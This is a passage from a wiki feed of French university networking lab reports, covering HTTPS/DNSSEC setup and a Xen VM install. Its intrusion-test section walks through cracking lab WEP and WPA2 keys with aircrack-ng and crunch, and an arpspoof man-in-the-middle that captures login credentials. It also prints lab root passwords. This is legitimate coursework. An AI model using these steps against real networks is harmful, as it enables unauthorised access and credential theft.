On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionn pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Glopglop.site_Securis%C3%A9.png&amp;diff=53950</id>
		<title>Fichier:Glopglop.site Securisé.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Glopglop.site_Securis%C3%A9.png&amp;diff=53950"/>
				<updated>2020-11-20T10:10:45Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53949</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53949"/>
				<updated>2020-11-20T10:02:23Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Envoie du SSL Certification Gandi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comem ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
